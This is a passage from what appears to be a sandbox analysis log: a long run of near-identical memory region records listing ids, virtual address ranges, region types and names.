0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8741 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8742 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8743 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8744 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8745 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8746 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8747 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8748 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8749 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8750 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8751 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8752 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8753 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8754 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8755 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8756 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8757 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8758 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8759 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8760 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8761 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8762 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8763 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8764 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8765 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8766 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8767 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8768 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8769 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8770 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8771 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8772 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8773 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8774 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8775 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8776 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8777 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8778 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8779 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8780 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8781 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8782 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8783 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8784 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8785 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8786 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8787 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8788 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8789 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8790 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8791 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8792 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8793 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8795 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8796 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8797 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8798 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8799 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8800 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8801 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8802 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8803 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8804 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8805 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8806 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8807 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8808 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8809 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8810 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8811 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8814 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8815 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8816 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8817 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8818 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8819 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8820 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8821 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8822 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8823 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8824 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8825 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8826 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8827 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8828 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8829 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8830 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8831 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8832 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8833 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8834 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8835 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8836 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8837 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8838 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8839 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8840 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8841 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8842 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 8843 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 8844 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8845 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8846 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8847 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8848 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8849 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8851 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8852 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8853 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8854 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8855 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8856 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8857 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8858 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8859 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8860 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8861 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8862 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8863 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8864 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8865 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8866 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8867 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8868 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8869 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8870 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8871 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8872 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8873 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8874 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8875 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8876 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8877 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8878 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8879 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8880 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8881 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8882 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8883 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8884 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8885 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8886 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8887 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8888 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8889 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8890 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8891 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8892 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8893 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8894 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8895 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8896 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8897 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8898 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8899 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8900 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8901 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8902 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8903 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8904 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8905 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8906 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8907 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8908 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8909 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8910 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8911 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8912 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8913 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8914 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8915 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8916 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8917 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8918 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8919 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8920 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8921 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8922 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8923 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8924 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8925 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8926 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8927 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8928 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8929 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8930 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 8931 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 